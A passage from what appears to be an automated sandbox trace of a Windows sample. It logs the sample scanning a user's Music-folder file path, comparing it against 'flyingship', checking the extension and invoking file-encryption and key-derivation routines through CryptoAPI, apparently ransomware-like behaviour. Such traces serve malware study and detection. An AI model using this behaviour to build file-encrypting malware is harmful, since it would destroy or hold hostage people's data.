dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="APDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PDdf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ddf3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aoZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZrXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rXaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XaHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aHEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HEczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EczyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="czyAP.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.884] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.884] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0184.884] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.884] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.885] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf67429e0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0xd410af80, ftLastAccessTime.dwHighDateTime=0x1d5e380, ftLastWriteTime.dwLowDateTime=0xd410af80, ftLastWriteTime.dwHighDateTime=0x1d5e380, nFileSizeHigh=0x0, nFileSizeLow=0xdf62, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="APDdf3aoZrXaHEczyAP.wav", cAlternateFileName="APDDF3~1.WAV")) returned 0x90af58 [0184.885] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0184.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.885] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.885] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.885] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.885] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.885] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0184.885] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.885] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.885] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0184.886] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.886] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.886] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.886] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.886] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0184.886] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.886] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0184.887] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.887] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.887] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0184.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.887] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.887] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.888] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.888] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.888] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.888] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0184.888] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.888] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0184.888] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 